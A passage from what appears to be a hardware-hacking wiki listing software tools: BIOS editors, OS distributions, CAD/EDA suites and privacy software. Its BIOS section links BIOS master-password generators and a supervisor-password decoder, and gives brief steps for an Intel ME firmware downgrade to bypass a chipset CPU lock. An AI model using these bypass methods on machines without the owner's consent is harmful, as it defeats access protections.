::*[https://forums.mydigitallife.net/threads/tool-to-insert-replace-slic-in-phoenix-insyde-dell-efi-bioses.13194 PhoenixTool] - is a Windows-only freeware GUI application written in C#. Used mostly for SLIC-related modifications, but it not limited to this task. Requires Microsoft .NET 3.5 to work properly. Supports unpacking firmware images from various vendor-specific formats like encrypted HP update files and Dell installers.
:::'''AMI'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.25.zip AMIBCP_2.25] [https://www.virustotal.com/gui/file/71050f3db40cc6c0a623d66c8eeb05d0a0818226fd11ed787452f4f540d45204 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.43.zip AMIBCP_2.43] [https://www.virustotal.com/gui/file/efa10cfe5f78c16982abf458eb50a4fde152631ad3b77838bd2013a763045ced VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.13.exe AMIBCP_3.13] [https://www.virustotal.com/gui/file/e0a5b1059f04813e72c6d4fa639d32567002fdd86321895b5987224a4518896e VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.37.exe AMIBCP_3.37] [https://www.virustotal.com/gui/file/1174e177b28fb7ecbac6c5043a9e8d78ff4756f657ea72369c5fb6b43b1f2623 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.46.exe AMIBCP_3.46] [https://www.virustotal.com/gui/file/84bd5b151286d4181ef26284d96ca49074e18574b8454c51cb0b34013ee5d073 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.47.exe AMIBCP_3.47] [https://www.virustotal.com/gui/file/20d93c6f868d4638676b7cde2c66c5589433c1480250aa0d774c4feef3337507 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.51.exe AMIBCP_3.51] [https://www.virustotal.com/gui/file/0d630b4b9c34d6c7132249a1a7bc3de33b39779fc90d9a367272cf57b4621aed VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.53.exe AMIBCP_4.53] [https://www.virustotal.com/gui/file/3f90e402dab9f64cbc4514e18bc2625ec7672da806cd9e0ef2e803b0ce104a01 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.55.exe AMIBCP_4.55] [https://www.virustotal.com/gui/file/451ad821a66e9ea89ee0544ce53cfab887dc0bb662a2de95f0e1aa1663dc6e06 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_2.22.1.exe MMTOOL_2.22.1] - MMtool stands for Module Management Tool. As one of AMI's BIOS/UEFI utilities, MMTool allows users to manage firmware file modules within the Aptio ROM image. [https://www.virustotal.com/gui/file/cf49f1e742f5cce68152f3c17df29e5c9aa7fb557c432402199159ffda44e007 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.12.exe MMTOOL_3.12] [https://www.virustotal.com/gui/file/78c3ca427878be5b07058f422914027462d3ac740b0de247169cc0aee4195e3b VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOl_3.19.exe MMTOOl_3.19] [https://www.virustotal.com/gui/file/b4b30c6ff911f18d3383b094628f59aa5ec3b109acd12aaef391acf9720e52af VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.19_Mod_21FiX.exe MMTOOL_3.19_Mod_21FiX] [https://www.virustotal.com/gui/file/66e2717fcac67b073d24916c74bc8d8dd7932b188d20b8b635b511e6195d5855 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22.EXE MMTOOL_3.22] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_1B_21Fix-BKMOD.EXE MMTOOL_3.22_1B_21Fix-BKMOD] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_CN_BKMod.exe MMTOOL_3.22_CN_BKMod] [https://www.virustotal.com/gui/file/f467d75962278a4e01d646cdf8008136912d8a1ddd588c45e2fcee9d7cd17140 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.23_CN_BKMod.exe MMTOOL_3.23_CN_BKMod] [https://www.virustotal.com/gui/file/9bf846d023312c889069b03f5ab7157e270fc67c5d295e745d0a5f27d12a71de VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.26.exe MMTOOL_3.26] [https://www.virustotal.com/gui/file/c5a64ea7ce2bea8556fa81e0069adbba793181bfaa76f59f4f472f0a471bac98 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_4.50.0.23.exe MMTOOL_4.50.0.23][https://www.virustotal.com/gui/file/7d0377a72e67e5a71400361416452440826832aeb2c9bebaa578e8af962eaafd VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.0.07.exe MMTOOL_5.0.07] [https://www.virustotal.com/gui/file/28049163fd1e3423c42b229a5f6ed877f14e7caf3b794bf7efb970b375e6ff41 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0024.exe MMTOOL_5.02.0024] [https://www.virustotal.com/gui/file/bbc3e75905997ddc05c523e57a72e49bbfcaf84dca64e460f10f8553b7fda9ee VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0025.exe MMTOOL_5.02.0025] [https://www.virustotal.com/gui/file/5d05d0bbea720d4b73dc66db55031c2659458696b9f143df3b7e2f43040289cc VT link]
:::'''Award'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/tree/main/Award_Bios_Editor Award Bios Editor] - is a editor for Award bios.
:::'''InsydeH2O'''
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.02.13.zip H2OEZE_x86_WIN_100.00.02.13] - H2OEZE™: Easy BIOS Editor that helps edit binaries in the BIOS, including Option ROMs, driver binaries, logos, and Setup values. [https://www.virustotal.com/gui/file/9660f1bf9436b258ec5ad857a94fbd0ec1f8fbff8ab22ca1dfcfb5ebbdcedf08 VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.03.04.zip H2OEZE_x86_WIN_100.00.03.04] [https://www.virustotal.com/gui/file/2a1005803da854693502093445906eb2cccb24947d6828bc1533ba3603c73b0a VT link]
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x64/H2OEZE_x64_WIN_100.00.03.04.rar H2OEZE_x64_WIN_100.00.03.04] [https://www.virustotal.com/gui/file/20d2d0336d30afd0b1961eb42dc061ce66a6fcfbfba1530e7abd9be883dcb45c VT link]
:::'''Phoenix'''
:::*[[Media:PhoenixBiosEditor2.2.13.zip]] (pw: recessim.com [https://www.virustotal.com/gui/file/3abf75ea7386f3dc24156bf6175a940867b8c742246cb8bf257fe5fc0b1cf9b5 VT link]) - is a software tool used to view and modify the settings and structure of Phoenix BIOS firmware images dating from between 2004 and 2008.

:Download all* the above tools in one archive, [https://github.com/direstraits96/BIOS-MOD-TOOLS/archive/refs/heads/main.zip click here]. [https://www.virustotal.com/gui/file/d8a75883ca8d292adcf40e5ed88584579b1c0c69f6ad5837fc56747233c56f9c VT link]

:::'''Tool collections'''
:::*[http://xdel.ru/downloads/bios-mods.com-tools/ bios-mods.com tools (2016)] - is a collection of bios modifying and flashing tools.

:::'''Microcode Extraction Tool'''
:::*[https://github.com/platomav/MCExtractor MCExtractor] - is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc.

:Bios password resetting
::*[https://archive.org/details/hp-bios-reset-mazzif HP BIOS Password Reset by MAZZIF] [https://www.virustotal.com/gui/file/9ddd094edc286f2cb8d63158d226986d9a0c184ca450580dfaf9754005df9d41 VT link] - A live USB tool made by Mazzif to reset older HP Probook and Elitebook BIOS passwords.

::*[[Media:Fujitsu bios unlock.zip|pwgen-fsi-6x4dec.py]] [https://www.virustotal.com/gui/file/3a43ba7c88f1f10576728ea291b3097c048f842eee30dda3121280c049c61b8a VT link] pwgen-fsi-6x4dec.py - is a python command-line utility for generating master unlock password for older Fujitsu notebooks. Tested on: E557, FH570, Q616, U728, T731, E734, U745, S752, E756

::*[https://github.com/dogbert/bios-pwgen/tree/master bios-pwgen] - BIOS Master Password Generators for older laptops [http://dogber1.blogspot.com/2009/05/table-of-reverse-engineered-bios.html blogpost] (dell, asus, fsi6x4, fxi-hex hpmini, insyde, samsung, sony-4x4, sony-serial).

::*[[Media:AMITSEDecrypt.zip]] [https://www.virustotal.com/gui/file/2b03ef2292863bd94dc6ce0f10412f27ec5abf95f1e3aca2d34dd3712fd45d12 VT link] - AMI supervisor password decoder called "AMITSEDecrypt" to decode them with the XOR key. Works on older AMI firmware images is able to recover supervisor password if set.

::*[https://bios-pw.org/ BIOS Master Password Generator (bios-pw.org)] - is a website that provides default or master BIOS unlock passwords for various laptop brands based on the system-generated hash or code displayed after too many failed BIOS password attempts.

=====HM70 PCH chipset Bypass Unsupported CPU=====
:Machine shuts down after 30 minutes if a '''"unsupported CPU"''' (Intel Core i3, i5 or i7) is installed in a notebook using the HM70 chipset. 
:The HM70 is aimed at entry-level laptops and budget-conscious consumers, and therefore is locked to [https://www.cpu-upgrade.com/mb-Intel_(chipsets)/HM70_Express.html support only dual core Pentium and Celeron CPUs..] 
:Intel has restricted this chipset in the firmware to shut down after 30 minutes if users attempt to upgrade their entry-level laptops.
::[[File:Hm70.png|none|thumb|200px|Intel HM70 PCH chipset. CPUs supported: Intel Pentium & Intel Celerons. [https://www.intel.com/content/www/us/en/products/sku/67419/mobile-intel-hm70-express-chipset/compatible.html Intel source]]]

======Intel Management Engine Firmware Downgrade Attack======

::First analyze the firmware after you have made a back-up. Make note of the Intel ME version.
::Then download the Intel ME version just below the firmware version you try to downgrade.
::Fire up your hex editor search in your bios blob for '''"0x24, 0x46, 0x50, 0x54, 0x0F, 0x00, 0x00, 0x00, 0x20"''' Intel ME 1.5M blob will start ascii text '''"$FPT"'''.
::Replace that entire section with the new downgraded Intel ME 1.5m blob. Before flashing make sure Me Analyzer recognises the change. Flash the modification and test it.
::If you don't see the ME version change with Me Analyzer first try to make note of the offset the Intel ME blob is at and then run it through me_cleaner before injecting a older one.

::This downgrade attack successfully bypassed the 30 minute shutdown restriction timer.

:'''Required tools''':
::*[[Software_Tools#Hex_Editors|Hex Editor.]]
::*[https://github.com/platomav/MEAnalyzer Me Analyzer] - Intel Engine & Graphics Firmware Analysis Tool.
::*[https://github.com/corna/me_cleaner me_cleaner] - Tool for partial deblobbing of Intel ME/TXE firmware images.
::*[https://winraid.level1techs.com/t/intel-conv-sec-management-engine-drivers-firmware-and-tools-2-15/30719 Intel (Converged Security) Management Engine: Drivers, Firmware and Tools for (CS)ME 2-15] - Useful resource.
::*[https://mega.nz/folder/2Q0klQpA#6o04nlV_4xqfx76tjvgi4g (CS)ME Firmware Archive.]

----

====Operating Systems====
Below are categories of operating systems used for various purposes, including binary reverse engineering, local software analysis, and wireless penetration testing with SDR for RF signal analysis.
=====Mostly X86-64=====
======Penetration Testing & Digital Forensics======
*[https://www.kali.org/ Kali Linux] - is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.

*[https://www.backbox.org/ BlackBox] is more than an operating system, it is a Free Open Source Community Project with the aim of promoting the culture of security in IT environment and give its contribution to make it better and safer.

*[https://blackarch.org/ BlackArch] - is an Arch Linux-based penetration testing distribution for penetration testers and security researchers.

*[https://www.parrotsec.org/ Parrot Security] - is based on top of Debian, the most advanced and recognized universal operating system that can run anywhere.

*[https://labs.fedoraproject.org/security/ Fedora Security Spin] - is a live media based on Fedora to provide a safe test environment for working on security auditing, forensics and penetration testing, coupled with all the Fedora Security features and tools.

*[https://www.caine-live.net/ CAINE] - CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project.

*[https://github.com/dracos-linux Dracos Linux] - is the Linux operating system from Indonesia, open source is built based on Debian live project under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering.

*[https://www.pentoo.ch/ Pentoo] - is a Live CD and Live USB designed for penetration testing and security assessment. Based off Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd.

======RF Signals Analysis OS [RISC SBC & X86-64]======
*[https://cemaxecuter.com/ DragonOS] - Out of the box OS for SDRs. Supports Raspberry Pi and x86-64.

======Privacy Operating System======
*[https://tails.net/ Tails] - is a portable operating system that protects against surveillance and censorship.
*[https://www.qubes-os.org/ Qubes OS] - is a security-focused operating system that uses virtualization to isolate applications and tasks into separate compartments (called qubes), protecting the system even if one part gets compromised.
*[https://www.whonix.org/ Whonix] is a privacy-focused Linux distribution that routes all internet traffic through the Tor network using a two-part system of an isolated gateway and a workstation to provide strong anonymity and security.

======Windows 10 IoT LTSC======
*[https://rentry.co/LTSC LTSC IoT Windows 10 debloat & setup guide] [[Media:LTSC.pdf]] - Useful when you want a clean debloated Windows 10 virtual machine. The IoT LTSC channel receives security updates until Jan 13, 2032.

*[https://rentry.org/fwt2 fwt2] [[Media:Fwt2.pdf]] - Read the /fwt/ paste for a more general overview of Windows.

======Previous Windows versions======
*[https://hackandpwn.com/windows-7-esu-patching/ Windows 7 ESU Patching] - Information about the minimum set of updates needed for Windows 7 latest ESU hotfixes/patches.

=====Embedded Devices [Network equipment]=====

*[https://openwrt.org/ OpenWrt] - is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic.

*[https://dd-wrt.com/ DD-WRT] - is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.

*[https://www.pfsense.org/ pfSense] - is a free and open-source operating system for firewalls and routers, primarily based on FreeBSD, that provides a comprehensive network security solution.

*[https://opnsense.org/ OPNsense] - is an open-source firewall and routing platform built on FreeBSD. It's designed to be user-friendly and easy to configure, offering a wide range of features found in commercial firewalls, plus many more.

=====Smartphones [Android "de-google"]=====

*[https://lineageos.org/ LineageOS] - is a free and open-source operating system for Android devices, based on the Android mobile platform.

*[https://grapheneos.org/ GrapheneOS] - is a privacy and security focused mobile OS with Android app compatibility developed as a non-profit open source project.

*[https://sailfishos.org/ Sailfish OS] - is a secure mobile operating system optimized to run on smartphones and tablets, and also easily adaptable to all kinds of embedded devices and use cases.

*[https://calyxos.org/ CalyxOS] - is a privacy-focused, "de-googled" Android-based operating system created by the Calyx Institute. It aims to defend online privacy, security, and accessibility by removing Google services and replacing them with free and open-source alternatives.

*[https://crdroid.net/ crDroid] - is a highly customized, free Android ROM, based on LineageOS, designed for gaming and customization.

*[https://www.ubuntu-touch.io/ Ubuntu Touch] - is a mobile operating system developed by the UBports community, based on the GNU/Linux operating system. It's a mobile version of Ubuntu, designed for touch-screen devices like smartphones and tablets, with a desktop-like experience.

----

====Tools for opening CAD or Boardview files====
'''Description''': Boardview is a type of file containing information about printed circuit boards, their components, used signals, test points and more. These files may have following extensions: .asc, .bdv, .brd, .bv, .cad, .cst, .gr, .f2b, .fz, .tvw and others.

*[https://pldaniels.com/flexbv5/ FlexBV] - Advanced FlexBV boardview software integrates your boardview files with PDF schematics to substantially ease the process of tracking down faults and understanding damaged boards

*[https://openboardview.org/ OpenBoardView] - is a Open Source Linux SDL/ImGui edition software for viewing .brd files, intended as a drop-in replacement for the "Test_Link" software and "Landrex".

*[https://www.cadence.com/ko_KR/home/tools/allegro-downloads-start.html Allegro®/OrCAD® FREE Physical Viewer] - is a free download that allows you to view and plot databases from Allegro PCB Editor, OrCAD PCB Editor, Allegro Package Designer, and Allegro PCB SI technology.

*[http://boardviewer.net/ BoardViewer] - is software intended for viewing various boardview file types like .tvw files and much more supported formats.

*CADview - simple old tool for viewing CAD files of PCB's (Windows). [[Media:CAD View.zip]] [https://www.virustotal.com/gui/file/9a64621ff34d8d674ba6580538908f4ea170fee9cc1cb700485bd41e3a3a42df VT link]

For resources to open in your favorite boardview program visit
[[Literature#Datasheets.2C_boardviews.2C_schematics.2C_manuals|Literature -> Datasheets boardviews & schematics]]

----

====Custom PCB Development Software====

=====Definition and Purpose=====
::'''Computer-Aided Design (CAD)''' refers to software that enables users to create, modify, analyze, or optimize designs in various fields such as architecture, mechanical engineering, and manufacturing. CAD is predominantly used for designing physical structures and components. It allows designers to visualize objects in two-dimensional (2D) or three-dimensional (3D) formats, facilitating precise planning and adjustments before production begins.

::In contrast, '''Electronic Design Automation (EDA)''' encompasses a suite of software tools specifically tailored for the design of electronic systems. EDA is crucial in industries like semiconductor manufacturing and printed ::circuit board (PCB) design. It focuses on automating the processes involved in designing electronic circuits at various levels—from high-level architectural descriptions down to detailed layouts.

::'''Integration Between CAD and EDA'''
::While CAD focuses on physical structures, EDA deals with electronic components. However, as products increasingly integrate both mechanical structures and electronic systems—such as IoT devices—the need for collaboration between CAD and EDA has grown. This integration allows designers to embed electronic circuits within mechanical models seamlessly.

=====Electronics Design Automation [[Wikipedia:Electronic_design_automation|(EDA)]] Suite for Developing Custom PCB's=====

*[https://www.kicad.org/ KiCAD] - is a free CAD suite for electronic design automation (EDA). It facilitates the design and simulation of electronic hardware. It features an integrated environment for schematic capture, PCB layout, manufacturing file viewing, ngspice-provided SPICE simulation, and engineering calculation.

*[https://easyeda.com/ EasyEDA] - EasyEDA is a web-based EDA tool suite that enables hardware engineers to design, simulate, share - publicly and privately - and discuss schematics, simulations and printed circuit boards. It can also be used [https://docs.easyeda.com/en/FAQ/Client/index.html offline].

*[https://fritzing.org/ Fritzing] - is an open-source hardware initiative that makes electronics accessible as a creative material for anyone.

*[https://librepcb.org/ LibrePCB] - is a free, cross-platform, easy-to-use electronic design automation suite to draw schematics and design printed circuit boards – for makers, students and professionals, from beginners to experts.

*[http://www.geda-project.org/ gEDA Project] - The gEDA project has produced and continues working on a full GPL'd suite and toolkit of Electronic Design Automation tools. These tools are used for electrical circuit design, schematic capture, simulation, prototyping, and production.

*[http://repo.hu/projects/pcb-rnd/ pcb-rnd] - is a free/open source, flexible, modular Printed Circuit Board editor. For design of professional and hobby boards. Is feature-rich and compatible. Has a long history, fast paced development, and big plansand is part of the coralEDA ecosystem.

=====Computer Aided Design [[Wikipedia:Computer-aided_design|(CAD)]] Mechanical Engineering=====

*[https://www.freecad.org/ FreeCAD] - is an open-source parametric 3D modeler made primarily to design real-life objects of any size. Parametric modeling allows you to easily modify your design by going back into your model history and changing its parameters.

*[https://openscad.org/ OpenSCAD] - is software for creating solid 3D CAD objects. It is free software and available for Linux/UNIX, MS Windows and Mac OS X.

*[https://brlcad.org/ BRL-CAD] - is a powerful open source cross-platform solid modeling system that includes interactive geometry editing, high-performance ray-tracing for rendering and geometric analysis, a system performance analysis benchmark suite, geometry libraries for application developers, and more than 30 years of active development.

*[https://solvespace.com/index.pl SolveSpace] - is a free (GPLv3) parametric 3d CAD tool. Modeling 3d parts, modeling 2d parts, 3d-printed parts, preparing CAM data, mechanism design, plane and solid geometry.

----
====Other software====

=====Display Driver Utilities (Windows)=====

*[https://github.com/lostindark/DriverStoreExplorer Driver Store Explorer (RAPR)] - is a tool used to manage the Windows driver store, a repository of driver packages that Windows uses to install and update hardware drivers. It helps users list, add, install, delete, and export driver packages, especially those from third-party vendors.

*[https://github.com/Wagnard/display-drivers-uninstaller DDU] - is a driver removal utility that can help you completely uninstall AMD/NVIDIA/Intel graphics card drivers and packages from your system, without leaving leftovers behind (including registry keys, folders and files, and driver store).

*[https://www.techpowerup.com/nvcleanstall/ NVCleanstall] - is a free utility from TechPowerUp that allows you to customize your NVIDIA GeForce driver installation. It enables you to remove unnecessary components and install only the drivers you need, potentially optimizing your system performance and minimizing "bloatware".

*[https://github.com/GSDragoon/RadeonSoftwareSlimmer Radeon Software Slimmer] - is a utility to trim down the bloat with Radeon Software for AMD GPUs on Microsoft Windows.

*[https://forums.guru3d.com/threads/nvslimmer-nvidia-driver-slimming-utility.423072/ NVSlimmer] - is a third-party utility created by uKER and available on guru3d.com that allows users to remove unwanted components from NVIDIA graphics driver installations, effectively "trimming" down the install base. It's not an official Nvidia utility.

=====Host Based Firewall [Windows FOSS]=====
*[https://github.com/tnodir/fort Fort Firewall] - is a very practical firewall that allows you to manage your privacy and security in Windows simply and flexibly. This open-source tool is a perfect alternative to the standard Windows firewall, giving you a lot of customizable features so you can work with your files and programs more comfortably.

=====Web Browsing=====
*[https://www.mozilla.org/firefox/ Mozilla Firefox] - is a free, open source web browser developed by the Mozilla Foundation and Mozilla Corporation in 2004. The Firefox web browser can be used with Windows, Mac and Linux operating systems, as well as Android and iOS mobile devices.

::Extensions & Configurations
:::*[https://github.com/hackademix/noscript NoScript] - The popular NoScript Security Suite browser extension.
:::*[https://github.com/ChrisAntaki/disable-webrtc-firefox WebRTC block] - WebRTC leaks your actual IP addresses from behind your VPN, by default. With this extension you can disable it.
:::*[https://github.com/arkenfox/user.js/ user.js] - Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening.
:::*[https://github.com/yokoffing/Betterfox Betterfox] - Firefox speed, privacy, and security: a user.js template for configuration. Your favorite browser, but better.
:::*[https://github.com/gorhill/uBlock uBlock] - Help users neutralize privacy-invading ads CPU and memory-efficient.
:::*[https://github.com/sereneblue/chameleon Chameleon] - is a WebExtension port of the popular Random Agent Spoofer. Spoofs a lot of client fingering techniques and adds security.
:::*[https://github.com/EFForg/privacybadger Privacy Badger] - is a browser extension that automatically learns to block invisible trackers. PB is made by the leading digital rights nonprofit EFF to stop companies from spying on you.

*[https://www.torproject.org/ Tor Browser] - [[Wikipedia:Tor_(network)|Tor]] (The Onion Router) is a network that anonymizes web traffic to provide truly private web browsing. The Tor Browser hides your IP address and browsing activity by redirecting web traffic through a series of different routers known as nodes.

*[https://guardianproject.info/apps/org.torproject.android/ Orbot for Android] - is a free proxy app that empowers other apps to use the internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities.

======Public Networks======

*[https://www.torproject.org/ [[Wikipedia:Tor_(netwerk)|Tor]]] - is an open-source privacy network that enables anonymous web browsing. The worldwide Tor computer network uses secure, encrypted protocols to ensure that users' online privacy is protected.

*[https://geti2p.net/ The Invisible Internet Project [[Wikipedia:I2P|(I2P)]]] - is a fully encrypted private network layer. It protects your activity and location. Every day people use the network to connect with people without worry of being tracked or their data being collected.

*[https://www.freenet.de/ FreeNet] - is a peer-to-peer platform for censorship-resistant, anonymous communication. It uses a decentralized distributed data store to keep and deliver information, and has a suite of free software for publishing and communicating on the Web without fear of censorship.

*[https://zeronet.io/ ZeroNet] - Open, free and uncensorable websites, using Bitcoin cryptography and BitTorrent network · We believe in open, free, and uncensored network.

*[https://lokinet.org/ Lokinet] - is an onion-router that lets you access the internet anonymously. Built on LLARP, the fastest onion-routing protocol in the world.

*[https://nymtech.net/ Nym] - protect internet traffic by routing it through a decentralised mixnet that can be accessed anonymously using zk-nyms.

=====Email Clients / Email Encryption Standards=====
*[https://www.thunderbird.net/ Mozilla ThunderBird] - is a free, open-source, cross-platform application for managing email, news feeds, chat, and news groups. It is a local email application, meaning it installs and runs as a client on your device, being rather than browser or web-based. [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq FAQ How to implement OpenPGP in Thunderbird].

*[https://www.openpgp.org/ OpenPGP] - is the most widely used email encryption standard. It is defined by the OpenPGP Working Group of the Internet Engineering Task Force (IETF) as a Proposed Standard in RFC 4880. OpenPGP was originally derived from the PGP software, created by Phil Zimmermann.

*[https://www.gnupg.org/ GnuPG] - is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications.

*[https://wiki.gnome.org/Apps/Evolution Evolution] - is a personal information management application that provides integrated mail, calendaring and address book functionality. Check the Privacy Policy sub-page for a general information about user data usage. [https://riseup.net/en/email/clients/evolution FAQ How to implement OpenPGP in Evolution].

*[https://neomutt.org/ NeoMutt] - is a command line mail reader (or MUA ). It's a fork of Mutt with added features.

=====Chat Applications / Platforms=====
*[https://www.teamspeak.com/ TeamSpeak] - is a VoIP application for audio communication between users via a chat channel, similar to a video meeting. Cross-platform with military-grade security, lag-free performance, privacy and complete control.
*[https://github.com/RetroShare/RetroShare RetroShare] - is a Free and Open Source cross-platform, Friend-2-Friend and secure decentralised communication platform.
*[https://github.com/JFreegman/toxic Toxic] - is a Tox-based P2P messenger that provides end-to-end encrypted communications without the use of centralized servers. It supports text messaging, file sharing, 1-on-1 voice and video calls, private audio conferences, public and private text group chats.
*[https://www.jabber.org/ Jabber] - is a original messaging service based on [https://xmpp.org/ XMPP] and has been continuously offered for free since 1999.
::XMPP clients & extensions
:::*[https://xmpp.org/software/ XMPP client list] - is a list of XMPP clients composed by XMPP itself.
:::*[https://otr.cypherpunks.ca/ Off-the-Record Messaging (OTR) for XMPP] - is a cryptographic protocol that provides encryption for instant messaging conversations. OTR uses a combination of AES symmetric-key algorithm with 128 bits key length, the Diffie–Hellman key exchange with 1536 bits group size, and the SHA-1 hash function.
:::*[https://omemo.im/ OMEMO.IM] is a free, secure XMPP-based chat client available for Android and Windows that utilizes the OMEMO (Multi-End Message and Object) end-to-end encryption protocol.
:::*[https://xmpp.org/extensions/xep-0384.html XEP-0384: OMEMO Encryption] defines an end-to-end encryption protocol for XMPP messaging that uses double-ratchet and key-exchange techniques to securely encrypt one-to-one and group chats across multiple devices.
*[https://getsession.org/ Session] - Session is an end-to-end encrypted messenger that minimises sensitive metadata, designed and built for people who want absolute privacy and freedom from any form of surveillance.
*[https://github.com/briar Briar] - is a messaging app designed for activists, journalists, and anyone else who needs a safe, easy and robust way to communicate. Unlike traditional messaging apps, Briar doesn't rely on a central server - messages are synchronized directly between the users' devices.
*[https://matrix.org/ Matrix] - is an open network for secure, decentralised communication.
*[https://discord.com/ Discord] - is a voice, video and text communication service used by over a hundred million people to hang out and talk with their friends and communities.
::Discord client advice
:::*1. Stop using the installed electron PC based version. Use the web version.
:::*2. Android stock client is spoiled with rubbish code slowing down your SoC and sending loads of analytics, use [https://github.com/Aliucord/Aliucord Aliucord] instead (but carefully read the readme.md, ToS issue).

=====File Archiver Utilities=====

*[https://www.7-zip.org/ 7-Zip] - is a free and open source file archiver.

*[https://github.com/M2Team/NanaZip NanaZip] - is a free and open source file archiver intended for the modern Windows experience.

*[https://peazip.github.io/ PeaZip] - is a free and open source file archiver, similar to WinRar, WinZip, and 7-Zip.

=====Disk Encryption Software=====

*[https://guardianproject.info/archive/luks/ Linux Unified Key Setup (LUKS)] - The Linux Unified Key Setup (LUKS) is a disk encryption specification created by Clemens Fruhwirth in 2004 and originally intended for Linux. LUKS implements a platform-independent standard on-disk format for use in various tools

*[https://www.veracrypt.fr/code/VeraCrypt/ VaraCrypt] - VeraCrypt is free open-source disk encryption software for Windows, Mac OS X and Linux. Support for on-the-fly encryption [[Wikipedia:Disk_encryption|(OTFE)]].

=====Image Manipulation Tools=====

*[https://www.gimp.org/ Gimp] - is the official website of the GNU Image Manipulation Program (GIMP). GIMP is a cross-platform image editor available for GNU/Linux, macOS, Windows and more operating systems. It is free software, you can change its source code and distribute your changes.

*[https://www.getpaint.net/ Paint.net] - is image and photo editing software for PCs that run Windows. It features an intuitive and innovative user interface with support for layers, unlimited undo, special effects, and a wide variety of useful and powerful tools. An active and growing online community provides friendly help, tutorials, and plugins.

=====Video Editing Software / 3D Creation / Dec, Enc, Transcode, etc / Media Players=====

*[https://www.blackmagicdesign.com/products/davinciresolve DaVinci Resolve] - is the world’s only solution that combines editing, color correction, visual effects, motion graphics and audio post production all in one software tool! Its elegant, modern interface is fast to learn and easy for new users, yet powerful for professionals.

*[https://shotcut.org/ Shotcut] - is a free, Open Source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support to 4k.

*[https://www.openshot.org/nl/ OpenShot] - is a free, Open Source video editor for Linux, Mac, and Windows. We designed OpenShot to be an easy to use, quick to learn, and surprisingly powerful video editor. Easily cut, slice, and edit any video or film.

